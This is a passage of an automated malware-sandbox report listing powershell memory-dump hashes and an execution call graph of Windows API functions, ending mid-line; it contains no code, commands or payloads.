                                                        • Opcode ID: 8f8102a1d2bca71a661a71aa3bad188d0f8fbabffa9199f280030ff9313e7e07
                                                        • Instruction ID: 231bf6e4992a010601cc632b5370fdf19bb2980b7374ecaa0540feb45216328d
                                                        • Opcode Fuzzy Hash: 8f8102a1d2bca71a661a71aa3bad188d0f8fbabffa9199f280030ff9313e7e07
                                                        • Instruction Fuzzy Hash: 6EF0BE32B0D606CFE669EE0CE4008A8B7E0FF8436071200BAE00DC70A3DA26EC40CB84
                                                        Memory Dump Source
                                                        • Source File: 00000007.00000002.2288851948.00007FF84769D000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF84769D000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_7_2_7ff84769d000_powershell.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 74ab7a4a66ba2294a96fd2e93c88522fbd618a6ea62a7648d9ae19f8cbc2293a
                                                        • Instruction ID: 0fe4cb9243b2056562133d91d404fb919c88de21e32c1f2f497daa6801757f37
                                                        • Opcode Fuzzy Hash: 74ab7a4a66ba2294a96fd2e93c88522fbd618a6ea62a7648d9ae19f8cbc2293a
                                                        • Instruction Fuzzy Hash: E2F0F47151CE08CFCB98EF29C485E163BE1FB68354B210998D44ACB256D634E882CB80
                                                        Memory Dump Source
                                                        • Source File: 00000007.00000002.2293193566.00007FF847880000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF847880000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_7_2_7ff847880000_powershell.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 579c9965734b586c742a29cefe68d0cee05d4fa8fdd40df939d1071b4c622de4
                                                        • Instruction ID: b18602c7c5d71cee4436a098c1ea11d6cbb0e87e2d98c9acd1ade44fbe3e871c
                                                        • Opcode Fuzzy Hash: 579c9965734b586c742a29cefe68d0cee05d4fa8fdd40df939d1071b4c622de4
                                                        • Instruction Fuzzy Hash: CCF05E32A0D5458FE755EE5CE4414AC77E0EF4536171600B6E10EC7063DA26AC448B94
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000007.00000002.2290788437.00007FF8477B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF8477B0000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_7_2_7ff8477b0000_powershell.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID: O_^$O_^$O_^$O_^$O_^
                                                        • API String ID: 0-2660881393
                                                        • Opcode ID: 3c66b7a86964083922ec3cd1f42b5b61939325f257a6cdfb11c5d8cdd3d665b3
                                                        • Instruction ID: 132efe9ec864cca71eb6937200dd91fec23e1c484258f0a88ed8437aec3f010c
                                                        • Opcode Fuzzy Hash: 3c66b7a86964083922ec3cd1f42b5b61939325f257a6cdfb11c5d8cdd3d665b3
                                                        • Instruction Fuzzy Hash: AB316156A0D6C19FD3475B3C28790E93FA0AE631AC30E10FBC4E98B263E9085417D769
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000007.00000002.2290788437.00007FF8477B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF8477B0000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_7_2_7ff8477b0000_powershell.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID: O_^$O_^$O_^$O_^
                                                        • API String ID: 0-934926442
                                                        • Opcode ID: 726c14e604a1a58b5ab13f5ca7d78c86332b69a8819991692d4bee53e326e7d2
                                                        • Instruction ID: 3a7bb75e4bb1640687ffc1f23792283b7350d2750f555bef236ea424541f2ca2
                                                        • Opcode Fuzzy Hash: 726c14e604a1a58b5ab13f5ca7d78c86332b69a8819991692d4bee53e326e7d2
                                                        • Instruction Fuzzy Hash: 0A21A05690D2C68ED3536B392C690F83FD0AF2319DB4D01F2C5E88F193EE08185BC296
                                                        Memory Dump Source
                                                        • Source File: 00000029.00000002.2201131509.00007FF847890000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF847890000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_41_2_7ff847890000_powershell.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 96e798afc55cbfb82f05328f84d747b532cdc2b63e27a03a3422f3bdaa1ebe23
                                                        • Instruction ID: 5dee35ca85451ccb2b37c73dccc2f490c861a5bf2c4638caf74ab069b48d8783
                                                        • Opcode Fuzzy Hash: 96e798afc55cbfb82f05328f84d747b532cdc2b63e27a03a3422f3bdaa1ebe23
                                                        • Instruction Fuzzy Hash: 8E323571F0DB898FE796AB3858541B97FE2EF562A4B0801FBD04DC7193E9189C0AC356
                                                        Memory Dump Source
                                                        • Source File: 00000029.00000002.2200559961.00007FF8477C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF8477C0000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_41_2_7ff8477c0000_powershell.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: db3466d979447704d4c1b8b6c00715e1833ca2fca828da3340d9841ba7cf7f59
                                                        • Instruction ID: c8917085a946213c84b82c1c72d365596cb97e6f1ed2c856128c63469918ad5e
                                                        • Opcode Fuzzy Hash: db3466d979447704d4c1b8b6c00715e1833ca2fca828da3340d9841ba7cf7f59
                                                        • Instruction Fuzzy Hash: 9F710531E0CA498FEB55EB6CD8556ECBFF1EF49310F1440BED449D7296CA256842CB80
                                                        Memory Dump Source
                                                        • Source File: 00000029.00000002.2200559961.00007FF8477C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF8477C0000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_41_2_7ff8477c0000_powershell.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 67d1617613e612b7a049b31fcb3c0c06bb00aa9b6616606570c7eb9b15762ca9
                                                        • Instruction ID: e7cee4b2ba115be1f43b0c07dcc42d4f6832ca0fc68a2a0ab0ce4e579f2bbcb6
                                                        • Opcode Fuzzy Hash: 67d1617613e612b7a049b31fcb3c0c06bb00aa9b6616606570c7eb9b15762ca9
                                                        • Instruction Fuzzy Hash: 4C01677111CB0C8FD744EF0CE451AB5B7E0FB99364F50056EE58AC3655D636E882CB46

                                                        Execution Graph

                                                        Execution Coverage:8%
                                                        Dynamic/Decrypted Code Coverage:0%
                                                        Signature Coverage:0.5%
                                                        Total number of Nodes:1239
                                                        Total number of Limit Nodes:44
                                                        execution_graph 38192 7ff7f7e882f0 38193 7ff7f7e88306 38192->38193 38206 7ff7f7e8836f 38192->38206 38194 7ff7f7e88324 38193->38194 38197 7ff7f7e88371 38193->38197 38193->38206 38312 7ff7f7ea2414 61 API calls 38194->38312 38196 7ff7f7e88347 38313 7ff7f7ea1998 138 API calls 38196->38313 38197->38206 38321 7ff7f7ea1998 138 API calls 38197->38321 38200 7ff7f7e8835e 38314 7ff7f7ea18ac 38200->38314 38205 7ff7f7e88578 38207 7ff7f7e8b540 147 API calls 38205->38207 38215 7ff7f7e8a410 38206->38215 38211 7ff7f7e8858f 38207->38211 38208 7ff7f7e8b540 147 API calls 38208->38205 38213 7ff7f7e88634 38211->38213 38322 7ff7f7e89628 175 API calls 38211->38322 38323 7ff7f7eda610 38213->38323 38332 7ff7f7eb7a68 38215->38332 38218 7ff7f7e8853a 38220 7ff7f7e8b540 38218->38220 38224 7ff7f7e8b55f setbuf 38220->38224 38221 7ff7f7e8b5a1 38222 7ff7f7e8b5d8 38221->38222 38223 7ff7f7e8b5b8 38221->38223 38480 7ff7f7eb8c1c 38222->38480 38366 7ff7f7e8aba0 38223->38366 38224->38221 38362 7ff7f7e8a4d0 38224->38362 38226 7ff7f7e8b5d3 38228 7ff7f7eda610 _handle_error 8 API calls 38226->38228 38229 7ff7f7e8854f 38228->38229 38229->38205 38229->38208 38230 7ff7f7e8b67f 38231 7ff7f7e8b6a5 38230->38231 38232 7ff7f7e8bbae 38230->38232 38250 7ff7f7e8bc91 38230->38250 38231->38226 38242 7ff7f7e8b6b5 38231->38242 38262 7ff7f7e8b79f 38231->38262 38235 7ff7f7eb8d00 48 API calls 38232->38235 38234 7ff7f7ea2574 126 API calls 38234->38226 38237 7ff7f7e8bc5c 38235->38237 38549 7ff7f7eb8d38 48 API calls 38237->38549 38240 7ff7f7e8bc69 38550 7ff7f7eb8d38 48 API calls 38240->38550 38242->38226 38514 7ff7f7eb8d00 38242->38514 38244 7ff7f7e8bc76 38551 7ff7f7eb8d38 48 API calls 38244->38551 38246 7ff7f7e8bc84 38552 7ff7f7eb8d88 48 API calls 38246->38552 38250->38226 38250->38234 38252 7ff7f7e8b726 38518 7ff7f7eb8d38 48 API calls 38252->38518 38254 7ff7f7e8b733 38255 7ff7f7e8b749 38254->38255 38519 7ff7f7eb8d88 48 API calls 38254->38519 38257 7ff7f7e8b75c 38255->38257 38520 7ff7f7eb8d38 48 API calls 38255->38520 38259 7ff7f7e8b779 38257->38259 38261 7ff7f7eb8d00 48 API calls 38257->38261 38521 7ff7f7eb8f94 38259->38521 38261->38257 38263 7ff7f7e8b8e5 38262->38263 38531 7ff7f7e8c3c8 CharLowerW CharUpperW 38262->38531 38532 7ff7f7ecd840 WideCharToMultiByte 38263->38532 38267 7ff7f7e8b9a1 38269 7ff7f7eb8d00 48 API calls 38267->38269 38270 7ff7f7e8b9c4 38269->38270 38535 7ff7f7eb8d38 48 API calls 38270->38535 38271 7ff7f7e8b910 38271->38267 38534 7ff7f7e8945c 55 API calls _handle_error 38271->38534 38273 7ff7f7e8b9d1 38536 7ff7f7eb8d38 48 API calls 38273->38536 38275 7ff7f7e8b9de 38537 7ff7f7eb8d88 48 API calls 38275->38537 38277 7ff7f7e8b9eb 38538 7ff7f7eb8d88 48 API calls 38277->38538 38279 7ff7f7e8ba0b 38280 7ff7f7eb8d00 48 API calls 38279->38280 38281 7ff7f7e8ba27 38280->38281 38539 7ff7f7eb8d88 48 API calls 38281->38539 38283 7ff7f7e8ba37 38284 7ff7f7e8ba49 38283->38284 38540 7ff7f7ecbc48 15 API calls 38283->38540 38541 7ff7f7eb8d88 48 API calls 38284->38541 38287 7ff7f7e8ba59 38288 7ff7f7eb8d00 48 API calls 38287->38288 38289 7ff7f7e8ba66 38288->38289 38290 7ff7f7eb8d00 48 API calls 38289->38290 38291 7ff7f7e8ba78 38290->38291 38542 7ff7f7eb8d38 48 API calls 38291->38542 38293 7ff7f7e8ba85 38543 7ff7f7eb8d88 48 API calls 38293->38543 38295 7ff7f7e8ba92 38296 7ff7f7e8bacd 38295->38296 38544 7ff7f7eb8d88 48 API calls 38295->38544 38546 7ff7f7eb8e3c 38296->38546 38299 7ff7f7e8bab2 38545 7ff7f7eb8d88 48 API calls 38299->38545 38301 7ff7f7e8bb33 38304 7ff7f7e8bb53 38301->38304 38305 7ff7f7eb8e3c 48 API calls 38301->38305 38303 7ff7f7eb8d00 48 API calls 38307 7ff7f7e8bb09 38303->38307 38306 7ff7f7e8bb6e 38304->38306 38309 7ff7f7eb8e3c 48 API calls 38304->38309 38305->38304 38310 7ff7f7eb8f94 126 API calls 38306->38310 38307->38301 38308 7ff7f7eb8e3c 48 API calls 38307->38308 38308->38301 38309->38306 38310->38226 38312->38196 38313->38200 38315 7ff7f7ea18db 38314->38315 38316 7ff7f7ea18ca 38314->38316 38315->38206 38316->38315 38317 7ff7f7ea18d6 38316->38317 38318 7ff7f7ea18de 38316->38318 38774 7ff7f7ea1c24 38317->38774 38779 7ff7f7ea1930 38318->38779 38321->38206 38322->38213 38324 7ff7f7eda61a 38323->38324 38325 7ff7f7e88663 38324->38325 38326 7ff7f7eda6a0 IsProcessorFeaturePresent 38324->38326 38327 7ff7f7eda6b7 38326->38327 38787 7ff7f7eda894 RtlCaptureContext RtlLookupFunctionEntry RtlVirtualUnwind 38327->38787 38329 7ff7f7eda6ca 38788 7ff7f7eda66c SetUnhandledExceptionFilter UnhandledExceptionFilter GetCurrentProcess TerminateProcess 38329->38788 38333 7ff7f7eb7a8d 38332->38333 38335 7ff7f7e8a434 38332->38335 38334 7ff7f7eb7aaf 38333->38334 38345 7ff7f7eb7340 157 API calls 38333->38345 38334->38335 38337 7ff7f7ea22e0 12 API calls 38334->38337 38335->38218 38340 7ff7f7ea22e0 38335->38340 38338 7ff7f7eb7adf 38337->38338 38346 7ff7f7ea2440 38338->38346 38356 7ff7f7ea20b4 38340->38356 38343 7ff7f7ea2307 38343->38218 38345->38334 38347 7ff7f7ea2454 38346->38347 38348 7ff7f7ea246a SetFilePointer 38346->38348 38349 7ff7f7ea24ad 38347->38349 38354 7ff7f7e9cd00 10 API calls 38347->38354 38348->38349 38350 7ff7f7ea248d GetLastError 38348->38350 38349->38335 38350->38349 38352 7ff7f7ea2497 38350->38352 38352->38349 38355 7ff7f7e9cd00 10 API calls 38352->38355 38359 7ff7f7ea2130 38356->38359 38360 7ff7f7ea20d0 38356->38360 38357 7ff7f7ea2102 SetFilePointer 38358 7ff7f7ea2126 GetLastError 38357->38358 38357->38359 38358->38359 38359->38343 38361 7ff7f7e9cd00 10 API calls 38359->38361 38360->38357 38363 7ff7f7e8a4ea 38362->38363 38364 7ff7f7e8a4ee 38363->38364 38365 7ff7f7ea2440 12 API calls 38363->38365 38364->38221 38365->38364 38367 7ff7f7e8abbf setbuf 38366->38367 38368 7ff7f7eb8c1c 48 API calls 38367->38368 38373 7ff7f7e8abf5 38368->38373 38369 7ff7f7e8b4af 38374 7ff7f7e8b4ff 38369->38374 38377 7ff7f7ea2574 126 API calls 38369->38377 38370 7ff7f7e8acbf 38371 7ff7f7e8acc8 38370->38371 38372 7ff7f7e8b35c 38370->38372 38380 7ff7f7e8acdd 38371->38380 38412 7ff7f7e8aea7 38371->38412 38479 7ff7f7e8ad60 38371->38479 38375 7ff7f7eb8eec 48 API calls 38372->38375 38373->38369 38395 7ff7f7e8aca7 38373->38395 38553 7ff7f7e99be0 38373->38553 38593 7ff7f7eb72c0 38374->38593 38379 7ff7f7e8b395 38375->38379 38377->38374 38382 7ff7f7e8b3ad 38379->38382 38592 7ff7f7e89e2c 48 API calls 38379->38592 38383 7ff7f7e8ace6 38380->38383 38384 7ff7f7e8ad68 38380->38384 38389 7ff7f7eb8eec 48 API calls 38382->38389 38383->38479 38564 7ff7f7eb8eec 38383->38564 38387 7ff7f7eb8eec 48 API calls 38384->38387 38385 7ff7f7e990b8 75 API calls 38390 7ff7f7e8ac8f 38385->38390 38391 7ff7f7e8ad9c 38387->38391 38388 7ff7f7eda610 _handle_error 8 API calls 38392 7ff7f7e8b52b 38388->38392 38393 7ff7f7e8b3d4 38389->38393 38390->38395 38396 7ff7f7ea2574 126 API calls 38390->38396 38397 7ff7f7eb8eec 48 API calls 38391->38397 38392->38226 38398 7ff7f7e8b3e6 38393->38398 38401 7ff7f7eb8eec 48 API calls 38393->38401 38395->38369 38395->38370 38396->38395 38400 7ff7f7e8ada9 38397->38400 38404 7ff7f7eb8eec 48 API calls 38398->38404 38403 7ff7f7eb8eec 48 API calls 38400->38403 38401->38398 38402 7ff7f7eb8eec 48 API calls 38405 7ff7f7e8ad31 38402->38405 38406 7ff7f7e8adb5 38403->38406 38407 7ff7f7e8b451 38404->38407 38408 7ff7f7eb8eec 48 API calls 38405->38408 38409 7ff7f7eb8eec 48 API calls 38406->38409 38410 7ff7f7e8b471 38407->38410 38416 7ff7f7eb8eec 48 API calls 38407->38416 38411 7ff7f7e8ad46 38408->38411 38415 7ff7f7e8adc2 38409->38415 38414 7ff7f7e8b486 38410->38414 38417 7ff7f7eb8e3c 48 API calls 38410->38417 38413 7ff7f7eb8f94 126 API calls 38411->38413 38420 7ff7f7e8afda 38412->38420 38582 7ff7f7e89b64 48 API calls _handle_error 38412->38582 38413->38479 38418 7ff7f7eb8f94 126 API calls 38414->38418 38419 7ff7f7eb8d00 48 API calls 38415->38419 38416->38410 38417->38414 38418->38479 38421 7ff7f7e8adcf 38419->38421 38430 7ff7f7e8aff2 38420->38430 38583 7ff7f7e89d98 48 API calls 38420->38583 38423 7ff7f7e990b8 75 API calls 38421->38423 38425 7ff7f7e8ae22 38423->38425 38426 7ff7f7eb8e3c 48 API calls 38425->38426 38427 7ff7f7e8ae33 38426->38427 38428 7ff7f7eb8e3c 48 API calls 38427->38428 38429 7ff7f7e8ae48 38428->38429 38568 7ff7f7ec9ce4 38429->38568 38432 7ff7f7e8b02b 38430->38432 38584 7ff7f7e89efc 48 API calls _handle_error 38430->38584 38431 7ff7f7e8b0af 38433 7ff7f7e8b0c8 38431->38433 38586 7ff7f7e8a1a0 48 API calls 2 library calls 38431->38586 38432->38431 38585 7ff7f7e8a2c8 48 API calls 38432->38585 38437 7ff7f7e8b0e2 38433->38437 38587 7ff7f7e8a350 48 API calls _handle_error 38433->38587 38441 7ff7f7eb8eec 48 API calls 38437->38441 38443 7ff7f7e8b0fc 38441->38443 38445 7ff7f7eb8eec 48 API calls 38443->38445 38447 7ff7f7e8b109 38445->38447 38446 7ff7f7eb8e3c 48 API calls 38448 7ff7f7e8ae80 38446->38448 38449 7ff7f7e8b11f 38447->38449 38452 7ff7f7eb8eec 48 API calls 38447->38452 38451 7ff7f7eb8f94 126 API calls 38448->38451 38578 7ff7f7eb8e94 38449->38578 38451->38479 38452->38449 38454 7ff7f7eb8eec 48 API calls 38455 7ff7f7e8b147 38454->38455 38456 7ff7f7eb8e94 48 API calls 38455->38456 38457 7ff7f7e8b15f 38456->38457 38458 7ff7f7eb8eec 48 API calls 38457->38458 38462 7ff7f7e8b16c 38458->38462 38459 7ff7f7e8b18a 38460 7ff7f7e8b1a9 38459->38460 38589 7ff7f7eb8d88 48 API calls 38459->38589 38461 7ff7f7eb8e94 48 API calls 38460->38461 38464 7ff7f7e8b1bc 38461->38464 38462->38459 38588 7ff7f7eb8d88 48 API calls 38462->38588 38466 7ff7f7eb8eec 48 API calls 38464->38466 38467 7ff7f7e8b1d6 38466->38467 38469 7ff7f7e8b1e9 38467->38469 38590 7ff7f7e8c3c8 CharLowerW CharUpperW 38467->38590 38469->38469 38470 7ff7f7eb8eec 48 API calls 38469->38470 38471 7ff7f7e8b21f 38470->38471 38472 7ff7f7eb8e3c 48 API calls 38471->38472 38473 7ff7f7e8b230 38472->38473 38474 7ff7f7e8b247 38473->38474 38475 7ff7f7eb8e3c 48 API calls 38473->38475 38476 7ff7f7eb8f94 126 API calls 38474->38476 38475->38474 38477 7ff7f7e8b278 38476->38477 38477->38479 38591 7ff7f7eb70d8 4 API calls 2 library calls 38477->38591 38479->38388 38634 7ff7f7eb8f28 38480->38634 38483 7ff7f7e990b8 38484 7ff7f7e99123 38483->38484 38498 7ff7f7e991a9 38483->38498 38484->38498 38652 7ff7f7ec7e74 38484->38652 38485 7ff7f7eda610 _handle_error 8 API calls 38487 7ff7f7e8b66e 38485->38487 38499 7ff7f7ea2574 38487->38499 38489 7ff7f7ecd840 WideCharToMultiByte 38490 7ff7f7e99157 38489->38490 38491 7ff7f7e991c4 38490->38491 38492 7ff7f7e9916a 38490->38492 38490->38498 38671 7ff7f7e99338 12 API calls _handle_error 38491->38671 38494 7ff7f7e9916f 38492->38494 38495 7ff7f7e991ab 38492->38495 38494->38498 38656 7ff7f7e998b0 38494->38656 38670 7ff7f7e9951c 71 API calls _handle_error 38495->38670 38498->38485 38500 7ff7f7ea25a5 38499->38500 38501 7ff7f7ea259e 38499->38501 38502 7ff7f7ea25ab GetStdHandle 38500->38502 38507 7ff7f7ea25ba 38500->38507 38501->38230 38502->38507 38503 7ff7f7ea2619 WriteFile 38503->38507 38504 7ff7f7ea25cf WriteFile 38505 7ff7f7ea260b 38504->38505 38504->38507 38505->38504 38505->38507 38506 7ff7f7ea2658 GetLastError 38506->38507 38507->38501 38507->38503 38507->38504 38507->38506 38512 7ff7f7ea2721 38507->38512 38768 7ff7f7ea3144 9 API calls 2 library calls 38507->38768 38769 7ff7f7e9cf34 10 API calls 38507->38769 38770 7ff7f7e9c95c 126 API calls 38507->38770 38509 7ff7f7ea2684 SetLastError 38509->38507 38771 7ff7f7e9cf14 10 API calls 38512->38771 38515 7ff7f7e8161c 48 API calls 38514->38515 38516 7ff7f7e8b719 38515->38516 38517 7ff7f7eb8d38 48 API calls 38516->38517 38517->38252 38518->38254 38519->38255 38520->38257 38522 7ff7f7eb9131 38521->38522 38524 7ff7f7eb8fcf 38521->38524 38522->38226 38523 7ff7f7eb905d 38525 7ff7f7e8161c 48 API calls 38523->38525 38526 7ff7f7eb90e0 38523->38526 38524->38523 38772 7ff7f7e9ca6c 48 API calls 3 library calls 38524->38772 38525->38526 38526->38522 38527 7ff7f7ea2574 126 API calls 38526->38527 38527->38522 38529 7ff7f7eb904c 38773 7ff7f7e9ca40 61 API calls _CxxThrowException 38529->38773 38531->38263 38533 7ff7f7e8b8f8 CharToOemA 38532->38533 38533->38271 38534->38267 38535->38273 38536->38275 38537->38277 38538->38279 38539->38283 38540->38284 38541->38287 38542->38293 38543->38295 38544->38299 38545->38296 38547 7ff7f7e8161c 48 API calls 38546->38547 38548 7ff7f7e8baf2 38547->38548 38548->38301 38548->38303 38548->38307 38549->38240 38550->38244 38551->38246 38552->38250 38597 7ff7f7e9901c CryptAcquireContextW 38553->38597 38557 7ff7f7e99c2a 38558 7ff7f7ec9ce4 8 API calls 38557->38558 38559 7ff7f7e99c49 38558->38559 38560 7ff7f7ec9b70 8 API calls 38559->38560 38561 7ff7f7e99c5b memcpy_s 38560->38561 38562 7ff7f7eda610 _handle_error 8 API calls 38561->38562 38563 7ff7f7e8ac34 38562->38563 38563->38385 38565 7ff7f7eb8efc 38564->38565 38566 7ff7f7eb8d00 48 API calls 38565->38566 38567 7ff7f7e8ad24 38565->38567 38566->38565 38567->38402 38569 7ff7f7e8ae60 38568->38569 38570 7ff7f7ec9d15 memcpy_s 38568->38570 38572 7ff7f7ec9b70 38569->38572 38570->38569 38613 7ff7f7ec9d74 38570->38613 38573 7ff7f7ec9bad memcpy_s 38572->38573 38577 7ff7f7ec9bd9 memcpy_s 38572->38577 38576 7ff7f7ec9d74 8 API calls 38573->38576 38573->38577 38574 7ff7f7ec9d74 8 API calls 38575 7ff7f7e8ae6d 38574->38575 38575->38446 38576->38577 38577->38574 38579 7ff7f7eb8eac 38578->38579 38580 7ff7f7eb8d00 48 API calls 38579->38580 38581 7ff7f7e8b137 38579->38581 38580->38579 38581->38454 38582->38420 38583->38430 38584->38432 38585->38431 38586->38433 38587->38437 38588->38459 38589->38460 38590->38469 38591->38479 38592->38382 38594 7ff7f7eb72dd 38593->38594 38596 7ff7f7eb7304 38594->38596 38617 7ff7f7eda480 38594->38617 38596->38479 38598 7ff7f7e99057 CryptGenRandom CryptReleaseContext 38597->38598 38599 7ff7f7e9907e 38597->38599 38598->38599 38600 7ff7f7e99089 38598->38600 38601 7ff7f7e99c9c 11 API calls 38599->38601 38602 7ff7f7e99c9c 38600->38602 38601->38600 38607 7ff7f7ecc0a8 GetSystemTime SystemTimeToFileTime 38602->38607 38604 7ff7f7e99cc5 38610 7ff7f7ee2d74 38604->38610 38608 7ff7f7eda610 _handle_error 8 API calls 38607->38608 38609 7ff7f7ecc0f1 38608->38609 38609->38604 38611 7ff7f7ee2d8b QueryPerformanceCounter 38610->38611 38612 7ff7f7e99cd7 38610->38612 38611->38612 38612->38557 38614 7ff7f7ec9dbc 38613->38614 38615 7ff7f7eda610 _handle_error 8 API calls 38614->38615 38616 7ff7f7ec9f40 38615->38616 38616->38570 38618 7ff7f7eda444 38617->38618 38619 7ff7f7eda47a 38618->38619 38623 7ff7f7ee36c0 38618->38623 38626 7ff7f7edb314 RtlPcToFileHeader RaiseException std::bad_alloc::bad_alloc _CxxThrowException 38618->38626 38627 7ff7f7edb2f4 RtlPcToFileHeader RaiseException std::bad_alloc::bad_alloc _CxxThrowException 38618->38627 38619->38596 38628 7ff7f7ee3700 38623->38628 38633 7ff7f7ee6938 EnterCriticalSection 38628->38633 38630 7ff7f7ee370d 38631 7ff7f7ee6998 fflush LeaveCriticalSection 38630->38631 38632 7ff7f7ee36d2 38631->38632 38632->38618 38637 7ff7f7e8161c 38634->38637 38636 7ff7f7e8b601 38636->38230 38636->38250 38636->38483 38638 7ff7f7e816aa memcpy_s 38637->38638 38639 7ff7f7e81640 38637->38639 38638->38636 38640 7ff7f7e8166d 38639->38640 38648 7ff7f7e9ca6c 48 API calls 3 library calls 38639->38648 38644 7ff7f7e816d4 38640->38644 38645 7ff7f7e8168e 38640->38645 38642 7ff7f7e81661 38649 7ff7f7e9cb64 8 API calls 38642->38649 38644->38638 38651 7ff7f7e9cb64 8 API calls 38644->38651 38645->38638 38650 7ff7f7e9cb64 8 API calls 38645->38650 38648->38642 38653 7ff7f7e99143 38652->38653 38654 7ff7f7ec7e95 38652->38654 38653->38489 38672 7ff7f7ec7ec8 38654->38672 38657 7ff7f7e99b45 38656->38657 38661 7ff7f7e99920 38656->38661 38658 7ff7f7eda610 _handle_error 8 API calls 38657->38658 38659 7ff7f7e99b61 38658->38659 38659->38498 38662 7ff7f7e9996d 38661->38662 38663 7ff7f7e99b75 38661->38663 38704 7ff7f7ec7da8 38661->38704 38662->38662 38711 7ff7f7e9a0f4 38662->38711 38664 7ff7f7ec7f24 68 API calls 38663->38664 38667 7ff7f7e99acb 38664->38667 38666 7ff7f7e999d0 38666->38666 38727 7ff7f7ec7f24 38666->38727 38667->38657 38741 7ff7f7ec4ea8 8 API calls _handle_error 38667->38741 38670->38498 38671->38498 38673 7ff7f7ec7efa memcpy_s 38672->38673 38678 7ff7f7ec7fb5 38673->38678 38686 7ff7f7ecb3f0 38673->38686 38675 7ff7f7ec805c GetCurrentProcessId 38677 7ff7f7ec8034 38675->38677 38677->38653 38678->38675 38680 7ff7f7ec7ff1 38678->38680 38679 7ff7f7ec7f7e GetProcAddressForCaller GetProcAddress 38679->38678 38680->38677 38695 7ff7f7e9ca6c 48 API calls 3 library calls 38680->38695 38682 7ff7f7ec801f 38696 7ff7f7e9cda4 10 API calls 2 library calls 38682->38696 38684 7ff7f7ec8027 38697 7ff7f7e9ca40 61 API calls _CxxThrowException 38684->38697 38698 7ff7f7eda5a0 38686->38698 38689 7ff7f7ecb42c 38700 7ff7f7eb48bc 38689->38700 38690 7ff7f7ecb428 38693 7ff7f7eda610 _handle_error 8 API calls 38690->38693 38694 7ff7f7ec7f72 38693->38694 38694->38678 38694->38679 38695->38682 38696->38684 38697->38677 38699 7ff7f7ecb3fc GetSystemDirectoryW 38698->38699 38699->38689 38699->38690 38701 7ff7f7eb48cb setbuf 38700->38701 38702 7ff7f7eda610 _handle_error 8 API calls 38701->38702 38703 7ff7f7eb493a LoadLibraryW 38702->38703 38703->38690 38705 7ff7f7ec7e74 68 API calls 38704->38705 38706 7ff7f7ec7ddc 38705->38706 38707 7ff7f7ec7e74 68 API calls 38706->38707 38708 7ff7f7ec7def 38707->38708 38709 7ff7f7eda610 _handle_error 8 API calls 38708->38709 38710 7ff7f7ec7e43 38709->38710 38710->38661 38715 7ff7f7e9a15c memcpy_s 38711->38715 38712 7ff7f7e9a358 38764 7ff7f7eda774 8 API calls __report_securityfailure 38712->38764 38714 7ff7f7e9a352 38763 7ff7f7eda774 8 API calls __report_securityfailure 38714->38763 38715->38712 38715->38714 38718 7ff7f7e9a192 38715->38718 38719 7ff7f7e9a34d 38715->38719 38717 7ff7f7e9a35e 38742 7ff7f7e99dd8 38718->38742 38762 7ff7f7eda774 8 API calls __report_securityfailure 38719->38762 38722 7ff7f7e99dd8 8 API calls 38723 7ff7f7e9a1d9 38722->38723 38723->38722 38724 7ff7f7e9a2f1 38723->38724 38725 7ff7f7eda610 _handle_error 8 API calls 38724->38725 38726 7ff7f7e9a33b 38725->38726 38726->38666 38728 7ff7f7ec7fb5 38727->38728 38729 7ff7f7ec7f5e 38727->38729 38731 7ff7f7ec805c GetCurrentProcessId 38728->38731 38732 7ff7f7ec7ff1 38728->38732 38729->38728 38730 7ff7f7ecb3f0 10 API calls 38729->38730 38733 7ff7f7ec7f72 38730->38733 38734 7ff7f7ec8034 38731->38734 38732->38734 38765 7ff7f7e9ca6c 48 API calls 3 library calls 38732->38765 38733->38728 38735 7ff7f7ec7f7e GetProcAddressForCaller GetProcAddress 38733->38735 38734->38667 38735->38728 38737 7ff7f7ec801f 38766 7ff7f7e9cda4 10 API calls 2 library calls 38737->38766 38739 7ff7f7ec8027 38767 7ff7f7e9ca40 61 API calls _CxxThrowException 38739->38767 38741->38657 38743 7ff7f7e99e46 38742->38743 38746 7ff7f7e99e6e memcpy_s 38742->38746 38744 7ff7f7ec9ce4 8 API calls 38743->38744 38745 7ff7f7e99e5e 38744->38745 38747 7ff7f7ec9b70 8 API calls 38745->38747 38748 7ff7f7e99e85 38746->38748 38750 7ff7f7ec9ce4 8 API calls 38746->38750 38747->38746 38749 7ff7f7ec9ce4 8 API calls 38748->38749 38751 7ff7f7e99f97 38749->38751 38750->38748 38752 7ff7f7ec9b70 8 API calls 38751->38752 38753 7ff7f7e99fa8 memcpy_s 38752->38753 38755 7ff7f7ec9ce4 8 API calls 38753->38755 38757 7ff7f7e99fb4 38753->38757 38754 7ff7f7ec9ce4 8 API calls 38756 7ff7f7e9a0bb 38754->38756 38755->38757 38758 7ff7f7ec9b70 8 API calls 38756->38758 38757->38754 38759 7ff7f7e9a0c9 38758->38759 38760 7ff7f7eda610 _handle_error 8 API 